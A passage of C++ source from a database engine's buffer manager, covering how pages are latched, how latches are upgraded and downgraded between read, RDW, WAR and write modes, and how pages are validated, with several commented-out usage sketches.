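// seed the latch with the previously cached hint so the hash lookup can be skipped
bfl.dwContext = *pdwHint;
Call( ErrBFRDWLatchPage( &bfl, ifmp, pgno, bflfHint, bfpri, tc ) );
// ... examine the page image at bfl.pv ...
// refresh the stable hint for the next latch attempt
*pdwHint = BFGetLatchHint( &bfl );
BFRDWUnlatch( &bfl );
HandleError:
return err;
}
#endif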
ERR ErrBFWARLatchPage( BFLatch* pbfl, IFMP ifmp, PGNO pgno, BFLatchFlags bflf, const BFPriority bfpri, const TraceContext& tc )
{
ERR err;
// validate IN args
Assert( FBFNotLatched( ifmp, pgno ) );
Assert( !( bflf & ( bflfNew | bflfNewIfUncached ) ) );
Assert( tc.iorReason.Iorp( ) == iorpNone );
// if we are mapping views then do not allow discretionary updates
if ( BoolParam( JET_paramEnableViewCache ) )
{
CallR( ErrERRCheck( errBFLatchConflict ) );
}
// RDW Latch the page
Call( ErrBFRDWLatchPage( pbfl, ifmp, pgno, bflf, bfpri, tc ) );
// mark this BF as WAR Latched
PBF( pbfl->dwContext )->fWARLatch = fTrue;
HandleError:
// validate OUT args
#ifdef DEBUG
Assert( err != wrnBFPageFault || !( bflf & bflfNoUncached ) );
Assert( err != errBFPageCached || ( bflf & bflfNoCached ) );
Assert( err != errBFPageNotCached || ( bflf & bflfNoUncached ) );
Assert( err != errBFLatchConflict || ( bflf & bflfNoWait ) );
if ( err >= JET_errSuccess )
{
Assert( FBFWARLatched( pbfl ) );
Assert( FBFICurrentPage( PBF( pbfl->dwContext ), ifmp, pgno ) );
Assert( PBF( pbfl->dwContext )->err != errBFIPageNotVerified );
Assert( PBF( pbfl->dwContext )->err != errBFIPageRemapNotReVerified );
Assert( FBFUpdatableLatch( pbfl ) );
Assert( PBF( pbfl->dwContext )->icbBuffer == PBF( pbfl->dwContext )->icbPage );
}
else
{
Assert( FBFNotLatched( ifmp, pgno ) );
}
#endif // DEBUG
return err;
}
ERR ErrBFWriteLatchPage( BFLatch* pbfl, IFMP ifmp, PGNO pgno, BFLatchFlags bflf, const BFPriority bfpri, const TraceContext& tc, BOOL* const pfCachedNewPage )
{
ERR err;
BOOL fCachedNewPage = fFalse;
RBS_POS rbsposSnapshot = rbsposMin;
AssertRTL( g_fBFInitialized );
// validate IN args
Assert( FBFNotLatched( ifmp, pgno ) );
Assert( !( bflf & ( bflfNew | bflfNewIfUncached ) ) || !( bflf & bflfNoTouch ) ); // required for proper tracing
Assert( tc.iorReason.Iorp( ) == iorpNone );
// latch the page
Call( ErrBFILatchPage( pbfl, ifmp, pgno, bflf, bfltWrite, bfpri, tc, &fCachedNewPage ) );
Assert( !fCachedNewPage || ( bflf & ( bflfNew | bflfNewIfUncached ) ) );
Assert( PBF( pbfl->dwContext )->ifmp == ifmp );
Assert( FBFUpdatableLatch( pbfl ) );
if ( bflf & ( bflfNew | bflfNewIfUncached ) )
{
// Capture the fact that we are doing a new-page (to allow us to revert this operation)
err = ErrBFICaptureNewPage( PBF( pbfl->dwContext ), &rbsposSnapshot );
}
else
{
// Capture the page pre-image if revert snapshot is configured (and the page is old enough)
err = ErrBFICapturePagePreimage( PBF( pbfl->dwContext ), &rbsposSnapshot );
}
if ( err < JET_errSuccess )
{
BFWriteUnlatch( pbfl );
goto HandleError;
}
#ifdef DEBUG
const PBF pbfPreMaint = PBF( pbfl->dwContext );
#endif
// try to write a page before we touch it if it would impede the checkpoint
err = ErrBFIMaintImpedingPageLatch( PBF( pbfl->dwContext ), fTrue, pbfl );
Assert( err >= JET_errSuccess ); // since page is updatable, maint impeding page won't fail.
if ( wrnBFLatchMaintConflict == err )
{
Assert( ( 0x1 & (DWORD_PTR)PBF( pbfl->dwContext ) ) == 0x0 ); // not hashed right
Assert( pbfPreMaint != PBF( pbfl->dwContext ) );
Assert( PBF( pbfl->dwContext )->sxwl.FOwnWriteLatch() );
err = ErrERRCheck( wrnBFBadLatchHint );
}
else
{
Assert( JET_errSuccess == err );
Assert( pbfPreMaint == PBF( pbfl->dwContext ) );
}
PBF( pbfl->dwContext )->rbsposSnapshot = rbsposSnapshot;
// ensure page is full sized for inserts
Assert( !fCachedNewPage ||
( PBF( pbfl->dwContext )->icbPage == PBF( pbfl->dwContext )->icbBuffer ) ||
( PBF( pbfl->dwContext )->bfdf == bfdfUntidy ) );
BFIRehydratePage( PBF( pbfl->dwContext ) );
Assert( FBFCurrentLatch( pbfl ) );
Assert( FBFUpdatableLatch( pbfl ) );
Assert( PBF( pbfl->dwContext )->icbBuffer == PBF( pbfl->dwContext )->icbPage );
HandleError:
// validate OUT args
#ifdef DEBUG
Assert( err != wrnBFPageFault || !( bflf & bflfNoUncached ) );
Assert( err != errBFPageCached || ( bflf & bflfNoCached ) );
Assert( err != errBFPageNotCached || ( bflf & bflfNoUncached ) );
Assert( err != errBFLatchConflict || ( bflf & bflfNoWait ) );
if ( err >= JET_errSuccess )
{
Assert( FBFWriteLatched( pbfl ) );
Assert( FBFICurrentPage( PBF( pbfl->dwContext ), ifmp, pgno ) );
Assert( PBF( pbfl->dwContext )->err != errBFIPageNotVerified );
Assert( PBF( pbfl->dwContext )->err != errBFIPageRemapNotReVerified );
Assert( FBFUpdatableLatch( pbfl ) );
Assert( PBF( pbfl->dwContext )->icbBuffer == PBF( pbfl->dwContext )->icbPage );
}
else
{
Assert( FBFNotLatched( ifmp, pgno ) );
}
#endif // DEBUG
if ( pfCachedNewPage != NULL )
{
*pfCachedNewPage = fCachedNewPage;
}
return err;
}
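// Illustrative sketch (not part of the engine): write latching a brand new page,
// formatting it, and marking it dirty before release. The example function and
// its parameter values are hypothetical; bflfNew, BFDirty() and BFWriteUnlatch()
// are the APIs defined in this module.
#if 0
ERR ErrExampleNewPage( const IFMP ifmp, const PGNO pgno, const BFPriority bfpri, const TraceContext& tc )
{
ERR err;
BFLatch bfl;
BOOL fCachedNewPage = fFalse;
Call( ErrBFWriteLatchPage( &bfl, ifmp, pgno, bflfNew, bfpri, tc, &fCachedNewPage ) );
// ... format the new page image at bfl.pv ...
// the buffer now differs from what is on disk, so mark it dirty
BFDirty( &bfl, bfdfDirty, tc );
BFWriteUnlatch( &bfl );
HandleError:
return err;
}
#endif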
ERR ErrBFUpgradeReadLatchToRDWLatch( BFLatch* pbfl )
{
// validate IN args
Assert( FBFReadLatched( pbfl ) );
ERR err;
PBF pbf;
CSXWLatch* psxwl;
CSXWLatch::ERR errSXWL;
// extract our BF and latch from the latch context
if ( pbfl->dwContext & 1 )
{
pbf = ((BFHashedLatch*)( pbfl->dwContext ^ 1 ))->pbf;
psxwl = &((BFHashedLatch*)( pbfl->dwContext ^ 1 ))->sxwl;
}
else
{
pbf = PBF( pbfl->dwContext );
psxwl = &pbf->sxwl;
}
// try to upgrade our shared latch to the exclusive latch
if ( psxwl == &pbf->sxwl )
{
errSXWL = pbf->sxwl.ErrUpgradeSharedLatchToExclusiveLatch();
}
else
{
errSXWL = pbf->sxwl.ErrTryAcquireExclusiveLatch();
if ( errSXWL == CSXWLatch::ERR::errSuccess )
{
psxwl->ReleaseSharedLatch();
pbfl->dwContext = DWORD_PTR( pbf );
}
}
// there was a latch conflict
if ( errSXWL == CSXWLatch::ERR::errLatchConflict )
{
// fail with a latch conflict
PERFOpt( cBFLatchConflict.Inc( perfinstGlobal ) );
Error( ErrERRCheck( errBFLatchConflict ) );
}
// there was no latch conflict
Assert( errSXWL == CSXWLatch::ERR::errSuccess );
// ensure that if the page is valid it is marked as valid. it is
// possible that we can't do this in the process of getting a Read
// Latch because we can't get the exclusive latch so we must make sure
// that we do it before we upgrade to a Write Latch or WAR Latch. the
// reason for this is that if we modify the page while it is still
// marked as not validated then another thread will misinterpret the
// page as invalid
//
// NOTE: it should be very rare that we will actually need to perform
// the full validation of this page. the reason we must do the full
// validation instead of just marking the page as validated is because
// the page may have been latched with bflfNoFaultFail in which case we
// do not know for sure if it was valid in the first place
(void)ErrBFIValidatePage( pbf, bfltExclusive, CPageValidationLogEvent::LOG_ALL, *TraceContextScope() );
Assert( PBF( pbfl->dwContext )->err != errBFIPageNotVerified );
Assert( PBF( pbfl->dwContext )->err != errBFIPageRemapNotReVerified );
// we have the RDW Latch
Assert( FBFICurrentPage( pbf, pbf->ifmp, pbf->pgno ) );
// try to write a page before we touch it if it would impede the checkpoint
err = ErrBFIMaintImpedingPageLatch( pbf, fFalse, pbfl );
if ( err < JET_errSuccess )
{
// critical failure, loosen up on the latch ...
Expected( JET_errOutOfMemory == err || errBFLatchConflict == err );
Assert( pbf == PBF( pbfl->dwContext ) );
PBF( pbfl->dwContext )->sxwl.DowngradeExclusiveLatchToSharedLatch();
Call( err );
}
if ( wrnBFLatchMaintConflict == err )
{
Assert( ( 0x1 & (DWORD_PTR)PBF( pbfl->dwContext ) ) == 0x0 ); // not hashed right
Assert( pbf != PBF( pbfl->dwContext ) );
Assert( pbf->sxwl.FNotOwner() );
// Since we needed to change the context, it is safest to claim latch conflict.
PBF( pbfl->dwContext )->sxwl.DowngradeExclusiveLatchToSharedLatch();
Call( ErrERRCheck( errBFLatchConflict ) );
}
else
{
Assert( JET_errSuccess == err );
Assert( pbf == PBF( pbfl->dwContext ) );
}
Assert( FBFCurrentLatch( pbfl ) );
Assert( FBFUpdatableLatch( pbfl ) );
HandleError:
// validate OUT args
#ifdef DEBUG
Assert( FBFCurrentLatch( pbfl ) );
if ( err >= JET_errSuccess )
{
Assert( FBFRDWLatched( pbfl ) );
Assert( PBF( pbfl->dwContext )->err != errBFIPageNotVerified );
Assert( PBF( pbfl->dwContext )->err != errBFIPageRemapNotReVerified );
Expected( FBFUpdatableLatch( pbfl ) ); // because we could upgrade this to w-latch in place
}
else
{
Assert( FBFReadLatched( pbfl ) );
}
#endif // DEBUG
return err;
}
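// Illustrative sketch (not part of the engine): upgrading a read latch to an
// RDW latch and treating errBFLatchConflict as a retriable condition by
// releasing the read latch so the caller can re-latch from scratch. The
// example wrapper is hypothetical; the upgrade / unlatch helpers are the ones
// defined in this module.
#if 0
ERR ErrExampleUpgradeToRDW( BFLatch* const pbfl )
{
const ERR err = ErrBFUpgradeReadLatchToRDWLatch( pbfl );
if ( err == errBFLatchConflict )
{
// could not upgrade in place; release the read latch and let the caller
// re-acquire the page via ErrBFRDWLatchPage()
BFReadUnlatch( pbfl );
}
return err;
}
#endif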
ERR ErrBFUpgradeReadLatchToWARLatch( BFLatch* pbfl )
{
// validate IN args
Assert( FBFReadLatched( pbfl ) );
ERR err;
PBF pbf;
CSXWLatch* psxwl;
CSXWLatch::ERR errSXWL;
// if we are mapping views then do not allow discretionary updates
if ( BoolParam( JET_paramEnableViewCache ) )
{
CallR( ErrERRCheck( errBFLatchConflict ) );
}
// extract our BF and latch from the latch context
if ( pbfl->dwContext & 1 )
{
pbf = ((BFHashedLatch*)( pbfl->dwContext ^ 1 ))->pbf;
psxwl = &((BFHashedLatch*)( pbfl->dwContext ^ 1 ))->sxwl;
}
else
{
pbf = PBF( pbfl->dwContext );
psxwl = &pbf->sxwl;
}
// try to upgrade our shared latch to the exclusive latch
if ( psxwl == &pbf->sxwl )
{
errSXWL = pbf->sxwl.ErrUpgradeSharedLatchToExclusiveLatch();
}
else
{
errSXWL = pbf->sxwl.ErrTryAcquireExclusiveLatch();
if ( errSXWL == CSXWLatch::ERR::errSuccess )
{
psxwl->ReleaseSharedLatch();
pbfl->dwContext = DWORD_PTR( pbf );
}
}
// there was a latch conflict
if ( errSXWL == CSXWLatch::ERR::errLatchConflict )
{
// fail with a latch conflict
PERFOpt( cBFLatchConflict.Inc( perfinstGlobal ) );
Error( ErrERRCheck( errBFLatchConflict ) );
}
// there was no latch conflict
Assert( errSXWL == CSXWLatch::ERR::errSuccess );
// unfortunately this page is being written, so there was an "effective" latch conflict
if ( !FBFIUpdatablePage( pbf ) )
{
Assert( pbf->err == wrnBFPageFlushPending );
if ( FBFICompleteFlushPage( pbf, bfltExclusive ) )
{
// completed the state transition associated with the write IO ...
Assert( FBFIUpdatablePage( pbf ) );
}
// With view-cache remapping, the FBFICompleteFlushPage() can leave
// the buffer in a freshly IO-error'd state (as if there was a read
// IO error) ... but since this function never really returned such
// before (assuming it was validated fully on relatch), we take the
// less risky approach of faking a latch conflict and let the buffer
// return the true error on the relatch path.
Assert( pbf->err != errBFIPageRemapNotReVerified );
if ( !FBFIUpdatablePage( pbf ) /* couldn't complete flush / still undergoing IO */ ||
pbf->err < JET_errSuccess /* remap failed read IO per above comment */ )
{
// Before latchless IO we used to return a latch conflict if the page was under
// write IO, because the write held the x-latch; do the same here ...
pbf->sxwl.DowngradeExclusiveLatchToSharedLatch();
PERFOpt( cBFLatchConflict.Inc( perfinstGlobal ) );
Error( ErrERRCheck( errBFLatchConflict ) );
}
}
// ensure that if the page is valid it is marked as valid. it is
// possible that we can't do this in the process of getting a Read
// Latch because we can't get the exclusive latch so we must make sure
// that we do it before we upgrade to a Write Latch or WAR Latch. the
// reason for this is that if we modify the page while it is still
// marked as not validated then another thread will misinterpret the
// page as invalid
//
// NOTE: it should be very rare that we will actually need to perform
// the full validation of this page. the reason we must do the full
// validation instead of just marking the page as validated is because
// the page may have been latched with bflfNoFaultFail in which case we
// do not know for sure if it was valid in the first place
(void)ErrBFIValidatePage( pbf, bfltExclusive, CPageValidationLogEvent::LOG_ALL, *TraceContextScope() );
Assert( PBF( pbfl->dwContext )->err != errBFIPageNotVerified );
Assert( PBF( pbfl->dwContext )->err != errBFIPageRemapNotReVerified );
// mark this BF as WAR Latched
pbf->fWARLatch = fTrue;
Assert( FBFICurrentPage( pbf, pbf->ifmp, pbf->pgno ) );
err = JET_errSuccess;
HandleError:
// validate OUT args
#ifdef DEBUG
Assert( FBFCurrentLatch( pbfl ) );
if ( err >= JET_errSuccess )
{
Assert( FBFWARLatched( pbfl ) );
Assert( PBF( pbfl->dwContext )->err != errBFIPageNotVerified );
Assert( PBF( pbfl->dwContext )->err != errBFIPageRemapNotReVerified );
Assert( FBFUpdatableLatch( pbfl ) );
}
else
{
Assert( FBFReadLatched( pbfl ) );
}
#endif // DEBUG
return err;
}
ERR ErrBFUpgradeReadLatchToWriteLatch( BFLatch* pbfl, const BOOL fCOWAllowed )
{
// validate IN args
Assert( FBFReadLatched( pbfl ) );
ERR err;
PBF pbf;
CSXWLatch* psxwl;
CSXWLatch::ERR errSXWL;
RBS_POS rbsposSnapshot = rbsposMin;
// extract our BF and latch from the latch context
if ( pbfl->dwContext & 1 )
{
pbf = ((BFHashedLatch*)( pbfl->dwContext ^ 1 ))->pbf;
psxwl = &((BFHashedLatch*)( pbfl->dwContext ^ 1 ))->sxwl;
}
else
{
pbf = PBF( pbfl->dwContext );
psxwl = &pbf->sxwl;
}
// try to upgrade our shared latch to the write latch
if ( psxwl == &pbf->sxwl )
{
errSXWL = pbf->sxwl.ErrUpgradeSharedLatchToWriteLatch();
}
else
{
errSXWL = pbf->sxwl.ErrTryAcquireExclusiveLatch();
if ( errSXWL == CSXWLatch::ERR::errSuccess )
{
psxwl->ReleaseSharedLatch();
errSXWL = pbf->sxwl.ErrUpgradeExclusiveLatchToWriteLatch();
pbfl->dwContext = DWORD_PTR( pbf );
}
}
// there was a latch conflict
if ( errSXWL == CSXWLatch::ERR::errLatchConflict )
{
// fail with a latch conflict
PERFOpt( cBFLatchConflict.Inc( perfinstGlobal ) );
Error( ErrERRCheck( errBFLatchConflict ) );
}
// there was no latch conflict
Assert( errSXWL == CSXWLatch::ERR::errSuccess ||
errSXWL == CSXWLatch::ERR::errWaitForWriteLatch );
// wait for ownership of the write latch if required
if ( errSXWL == CSXWLatch::ERR::errWaitForWriteLatch )
{
PERFOpt( cBFLatchStall.Inc( perfinstGlobal ) );
pbf->sxwl.WaitForWriteLatch();
}
#ifdef MINIMAL_FUNCTIONALITY
#else // !MINIMAL_FUNCTIONALITY
// if this BF has a hashed latch then grab all the other write latches
if ( pbf->bfls == bflsHashed )
{
const size_t cProcs = (size_t)OSSyncGetProcessorCountMax();
for ( size_t iProc = 0; iProc < cProcs; iProc++ )
{
CSXWLatch* const psxwlProc = &Ppls( iProc )->rgBFHashedLatch[ pbf->iHashedLatch ].sxwl;
if ( psxwlProc->ErrAcquireExclusiveLatch() == CSXWLatch::ERR::errWaitForExclusiveLatch )
{
PERFOpt( cBFLatchStall.Inc( perfinstGlobal ) );
psxwlProc->WaitForExclusiveLatch();
}
if ( psxwlProc->ErrUpgradeExclusiveLatchToWriteLatch() == CSXWLatch::ERR::errWaitForWriteLatch )
{
PERFOpt( cBFLatchStall.Inc( perfinstGlobal ) );
psxwlProc->WaitForWriteLatch();
}
}
}
#endif // MINIMAL_FUNCTIONALITY
// ensure that if the page is valid it is marked as valid. it is
// possible that we can't do this in the process of getting a Read
// Latch because we can't get the exclusive latch so we must make sure
// that we do it before we upgrade to a Write Latch or WAR Latch. the
// reason for this is that if we modify the page while it is still
// marked as not validated then another thread will misinterpret the
// page as invalid
//
// NOTE: it should be very rare that we will actually need to perform
// the full validation of this page. the reason we must do the full
// validation instead of just marking the page as validated is because
// the page may have been latched with bflfNoFaultFail in which case we
// do not know for sure if it was valid in the first place
(void)ErrBFIValidatePage( pbf, bfltWrite, CPageValidationLogEvent::LOG_ALL, *TraceContextScope() );
Assert( PBF( pbfl->dwContext )->err != errBFIPageNotVerified );
Assert( PBF( pbfl->dwContext )->err != errBFIPageRemapNotReVerified );
if ( !fCOWAllowed && !FBFIUpdatablePage( PBF( pbfl->dwContext ) ) )
{
// we don't allow cows here ...
PBF( pbfl->dwContext )->sxwl.DowngradeWriteLatchToSharedLatch();
Call( ErrERRCheck( errBFLatchConflict ) );
}
// Capture the page pre-image if revert snapshot is configured (and the page is old enough)
err = ErrBFICapturePagePreimage( PBF( pbfl->dwContext ), &rbsposSnapshot );
if ( err < JET_errSuccess )
{
PBF( pbfl->dwContext )->sxwl.DowngradeWriteLatchToSharedLatch();
goto HandleError;
}
// try to write a page before we touch it if it would impede the checkpoint
err = ErrBFIMaintImpedingPageLatch( pbf, fTrue, pbfl );
if ( err < JET_errSuccess )
{
// critical failure, loosen up on the latch ...
Expected( JET_errOutOfMemory == err || JET_errOutOfBuffers == err || errBFLatchConflict == err );
Assert( pbf == PBF( pbfl->dwContext ) );
PBF( pbfl->dwContext )->sxwl.DowngradeWriteLatchToSharedLatch();
Call( err );
}
if ( wrnBFLatchMaintConflict == err )
{
Assert( ( 0x1 & (DWORD_PTR)PBF( pbfl->dwContext ) ) == 0x0 ); // not hashed right
Assert( pbf != PBF( pbfl->dwContext ) );
Assert( pbf->sxwl.FNotOwner() );
// Since we needed to change the context, it is safest to claim latch conflict.
PBF( pbfl->dwContext )->sxwl.DowngradeWriteLatchToSharedLatch();
Call( ErrERRCheck( errBFLatchConflict ) );
}
else
{
Assert( JET_errSuccess == err );
Assert( pbf == PBF( pbfl->dwContext ) );
}
PBF( pbfl->dwContext )->rbsposSnapshot = rbsposSnapshot;
// ensure page is full sized for inserts
BFIRehydratePage( PBF( pbfl->dwContext ) );
Assert( FBFCurrentLatch( pbfl ) );
Assert( FBFUpdatableLatch( pbfl ) );
Assert( PBF( pbfl->dwContext )->icbBuffer == PBF( pbfl->dwContext )->icbPage );
HandleError:
// validate OUT args
#ifdef DEBUG
Assert( FBFCurrentLatch( pbfl ) );
if ( err >= JET_errSuccess )
{
Assert( FBFWriteLatched( pbfl ) );
Assert( PBF( pbfl->dwContext )->err != errBFIPageNotVerified );
Assert( PBF( pbfl->dwContext )->err != errBFIPageRemapNotReVerified );
Assert( FBFUpdatableLatch( pbfl ) );
Assert( PBF( pbfl->dwContext )->icbBuffer == PBF( pbfl->dwContext )->icbPage );
}
else
{
Assert( FBFReadLatched( pbfl ) );
}
#endif // DEBUG
return err;
}
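// Illustrative sketch (not part of the engine): upgrading a read latch directly
// to a write latch, modifying the page and releasing it. Whether the caller can
// tolerate a copy-on-write of a flush-pending buffer (fCOWAllowed) is caller
// policy, so the value passed here is an assumption for the example.
#if 0
ERR ErrExampleUpgradeToWrite( BFLatch* const pbfl, const TraceContext& tc )
{
const ERR err = ErrBFUpgradeReadLatchToWriteLatch( pbfl, fTrue /* fCOWAllowed */ );
if ( err >= JET_errSuccess )
{
// ... modify the page image at pbfl->pv ...
BFDirty( pbfl, bfdfDirty, tc );
BFWriteUnlatch( pbfl );
}
else
{
// on failure the latch is still a read latch (see the DEBUG validation above)
BFReadUnlatch( pbfl );
}
return err;
}
#endif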
ERR ErrBFUpgradeRDWLatchToWARLatch( BFLatch* pbfl )
{
// validate IN args
Assert( FBFRDWLatched( pbfl ) );
PBF pbf = PBF( pbfl->dwContext );
// ordinarily, I would disallow discretionary updates when mapping views
// by claiming a latch conflict. however, that is not possible here due
// to API convention. so, we will allow it to happen knowing that the
// change will almost certainly be thrown away and re-applied repeatedly
// // if we are mapping views then do not allow discretionary updates
//
// if ( BoolParam( JET_paramEnableViewCache ) )
// {
// CallR( ErrERRCheck( errBFLatchConflict ) );
// }
// mark this BF as WAR Latched
pbf->fWARLatch = fTrue;
// validate OUT args
Assert( FBFWARLatched( pbfl ) );
Assert( FBFCurrentLatch( pbfl ) );
Assert( PBF( pbfl->dwContext )->err != errBFIPageNotVerified );
Assert( PBF( pbfl->dwContext )->err != errBFIPageRemapNotReVerified );
Assert( FBFUpdatableLatch( pbfl ) );
// FYI, Not true ... interesting, FVERCheckUncommittedFreedSpace() runs on compressed page.
//Expected( PBF( pbfl->dwContext )->icbBuffer == PBF( pbfl->dwContext )->icbPage );
// Since we guarantee this, we should change this function to BFUpgradeRDWLatchToWARLatch()
return JET_errSuccess;
}
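// Illustrative sketch (not part of the engine): performing a discretionary
// (WAR) update under an existing RDW latch. The update itself is elided and
// the choice of bfdfUntidy is an assumption for the example; the upgrade /
// downgrade helpers are the ones defined in this module.
#if 0
void ExampleDiscretionaryUpdate( BFLatch* const pbfl, const TraceContext& tc )
{
// always succeeds today (see the note above about making this function void)
CallS( ErrBFUpgradeRDWLatchToWARLatch( pbfl ) );
// ... apply a small discretionary change to the page image at pbfl->pv ...
BFDirty( pbfl, bfdfUntidy, tc );
// drop back to the RDW latch (or release entirely with BFWARUnlatch())
BFDowngradeWARLatchToRDWLatch( pbfl );
}
#endif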
ERR ErrBFUpgradeRDWLatchToWriteLatch( BFLatch* pbfl )
{
// validate IN args
Assert( FBFRDWLatched( pbfl ) );
ERR err = JET_errSuccess;
PBF pbf = PBF( pbfl->dwContext );
CSXWLatch::ERR errSXWL;
RBS_POS rbsposSnapshot = rbsposMin;
// upgrade our exclusive latch to the write latch
errSXWL = pbf->sxwl.ErrUpgradeExclusiveLatchToWriteLatch();
Assert( errSXWL == CSXWLatch::ERR::errSuccess ||
errSXWL == CSXWLatch::ERR::errWaitForWriteLatch );
// wait for ownership of the write latch if required
if ( errSXWL == CSXWLatch::ERR::errWaitForWriteLatch )
{
PERFOpt( cBFLatchStall.Inc( perfinstGlobal ) );
pbf->sxwl.WaitForWriteLatch();
}
// RDW already granted updatable latch, so this should be safe ...
Assert( FBFUpdatableLatch( pbfl ) );
#ifdef MINIMAL_FUNCTIONALITY
#else // !MINIMAL_FUNCTIONALITY
// if this BF has a hashed latch then grab all the other write latches
if ( pbf->bfls == bflsHashed )
{
const size_t cProcs = (size_t)OSSyncGetProcessorCountMax();
for ( size_t iProc = 0; iProc < cProcs; iProc++ )
{
CSXWLatch* const psxwlProc = &Ppls( iProc )->rgBFHashedLatch[ pbf->iHashedLatch ].sxwl;
if ( psxwlProc->ErrAcquireExclusiveLatch() == CSXWLatch::ERR::errWaitForExclusiveLatch )
{
PERFOpt( cBFLatchStall.Inc( perfinstGlobal ) );
psxwlProc->WaitForExclusiveLatch();
}
if ( psxwlProc->ErrUpgradeExclusiveLatchToWriteLatch() == CSXWLatch::ERR::errWaitForWriteLatch )
{
PERFOpt( cBFLatchStall.Inc( perfinstGlobal ) );
psxwlProc->WaitForWriteLatch();
}
}
}
#endif // MINIMAL_FUNCTIONALITY
Assert( FBFICurrentPage( PBF( pbfl->dwContext ), PBF( pbfl->dwContext )->ifmp, PBF( pbfl->dwContext )->pgno ) );
// Capture the page pre-image if revert snapshot is configured (and the page is old enough)
err = ErrBFICapturePagePreimage( PBF( pbfl->dwContext ), &rbsposSnapshot );
if ( err < JET_errSuccess )
{
PBF( pbfl->dwContext )->sxwl.DowngradeWriteLatchToExclusiveLatch();
goto HandleError;
}
// try to write a page before we touch it if it would impede the checkpoint
// Note: This is the hardest case to move to a version copy scheme ...
BFIMaintImpedingPage( PBF( pbfl->dwContext ) );
PBF( pbfl->dwContext )->rbsposSnapshot = rbsposSnapshot;
// ensure page is full sized for inserts
BFIRehydratePage( PBF( pbfl->dwContext ) );
HandleError:
// validate OUT args
#ifdef DEBUG
Assert( FBFCurrentLatch( pbfl ) );
if ( err >= JET_errSuccess )
{
Assert( FBFWriteLatched( pbfl ) );
Assert( FBFCurrentLatch( pbfl ) );
Assert( PBF( pbfl->dwContext )->err != errBFIPageNotVerified );
Assert( PBF( pbfl->dwContext )->err != errBFIPageRemapNotReVerified );
Assert( FBFUpdatableLatch( pbfl ) );
Assert( PBF( pbfl->dwContext )->icbBuffer == PBF( pbfl->dwContext )->icbPage );
}
else
{
Assert( FBFRDWLatched( pbfl ) );
}
#endif
return err;
}
void BFDowngradeWriteLatchToRDWLatch( BFLatch* pbfl )
{
// validate IN args
Assert( FBFWriteLatched( pbfl ) );
PBF pbf = PBF( pbfl->dwContext );
#ifdef MINIMAL_FUNCTIONALITY
#else // !MINIMAL_FUNCTIONALITY
// if this BF has a hashed latch then release all the other write latches
if ( pbf->bfls == bflsHashed )
{
const size_t cProcs = (size_t)OSSyncGetProcessorCountMax();
for ( size_t iProc = 0; iProc < cProcs; iProc++ )
{
CSXWLatch* const psxwlProc = &Ppls( iProc )->rgBFHashedLatch[ pbf->iHashedLatch ].sxwl;
psxwlProc->ReleaseWriteLatch();
}
}
#endif // MINIMAL_FUNCTIONALITY
BFIValidatePagePgno( pbf );
// should always be a used page at this point
BFIValidatePageUsed( pbf );
// try to dehydrate page if possible
BFIDehydratePage( pbf, fFalse );
// downgrade our write latch to the exclusive latch
pbf->sxwl.DowngradeWriteLatchToExclusiveLatch();
// validate OUT args
Assert( FBFRDWLatched( pbfl ) );
}
void BFDowngradeWARLatchToRDWLatch( BFLatch* pbfl )
{
// validate IN args
Assert( FBFWARLatched( pbfl ) );
PBF pbf = PBF( pbfl->dwContext );
// mark this BF as not WAR Latched
pbf->fWARLatch = fFalse;
// validate OUT args
Assert( FBFRDWLatched( pbfl ) );
}
void BFDowngradeWriteLatchToReadLatch( BFLatch* pbfl )
{
// validate IN args
Assert( FBFWriteLatched( pbfl ) );
PBF pbf = PBF( pbfl->dwContext );
#ifdef MINIMAL_FUNCTIONALITY
#else // !MINIMAL_FUNCTIONALITY
// if this BF has a hashed latch then release all the other write latches
if ( pbf->bfls == bflsHashed )
{
const size_t cProcs = (size_t)OSSyncGetProcessorCountMax();
for ( size_t iProc = 0; iProc < cProcs; iProc++ )
{
CSXWLatch* const psxwlProc = &Ppls( iProc )->rgBFHashedLatch[ pbf->iHashedLatch ].sxwl;
psxwlProc->ReleaseWriteLatch();
}
}
#endif // MINIMAL_FUNCTIONALITY
BFIValidatePagePgno( pbf );
// should always be a used page at this point
BFIValidatePageUsed( pbf );
// see if we want to opportunistically version this page to try to flush
PBF pbfOpportunisticCheckpointAdv = NULL;
BFIOpportunisticallyVersionPage( pbf, &pbfOpportunisticCheckpointAdv );
// generally speaking, we should not be downgrading (or releasing) a write latch on a clean page.
Assert( pbf->bfdf != bfdfClean );
// try to dehydrate page if possible
BFIDehydratePage( pbf, fFalse );
// downgrade our write latch to a shared latch
pbf->sxwl.DowngradeWriteLatchToSharedLatch();
// attempt to flush the versioned page
if ( pbfOpportunisticCheckpointAdv )
{
BFIOpportunisticallyFlushPage( pbfOpportunisticCheckpointAdv, iorpBFCheckpointAdv );
}
// validate OUT args
Assert( FBFReadLatched( pbfl ) );
}
void BFDowngradeWARLatchToReadLatch( BFLatch* pbfl )
{
// validate IN args
Assert( FBFWARLatched( pbfl ) );
PBF pbf = PBF( pbfl->dwContext );
// should always be a used page at this point
BFIValidatePageUsed( pbf );
// mark this BF as not WAR Latched
pbf->fWARLatch = fFalse;
// see if we want to opportunistically version this page to try to flush
PBF pbfOpportunisticCheckpointAdv = NULL;
BFIOpportunisticallyVersionPage( pbf, &pbfOpportunisticCheckpointAdv );
// downgrade our exclusive latch to a shared latch
pbf->sxwl.DowngradeExclusiveLatchToSharedLatch();
// attempt to flush the versioned page
if ( pbfOpportunisticCheckpointAdv )
{
BFIOpportunisticallyFlushPage( pbfOpportunisticCheckpointAdv, iorpBFCheckpointAdv );
}
// validate OUT args
Assert( FBFReadLatched( pbfl ) );
}
void BFDowngradeRDWLatchToReadLatch( BFLatch* pbfl )
{
// validate IN args
Assert( FBFRDWLatched( pbfl ) );
PBF pbf = PBF( pbfl->dwContext );
// should always be a used page at this point
BFIValidatePageUsed( pbf );
// see if we want to opportunistically version this page to try to flush
PBF pbfOpportunisticCheckpointAdv = NULL;
BFIOpportunisticallyVersionPage( pbf, &pbfOpportunisticCheckpointAdv );
// downgrade our exclusive latch to a shared latch
pbf->sxwl.DowngradeExclusiveLatchToSharedLatch();
// attempt to flush the versioned page
if ( pbfOpportunisticCheckpointAdv )
{
BFIOpportunisticallyFlushPage( pbfOpportunisticCheckpointAdv, iorpBFCheckpointAdv );
}
// validate OUT args
Assert( FBFReadLatched( pbfl ) );
}
void BFWriteUnlatch( BFLatch* pbfl )
{
// validate IN args
Assert( FBFWriteLatched( pbfl ) );
const PBF pbf = PBF( pbfl->dwContext );
#ifdef MINIMAL_FUNCTIONALITY
#else // !MINIMAL_FUNCTIONALITY
// if this BF has a hashed latch then release all the other write latches
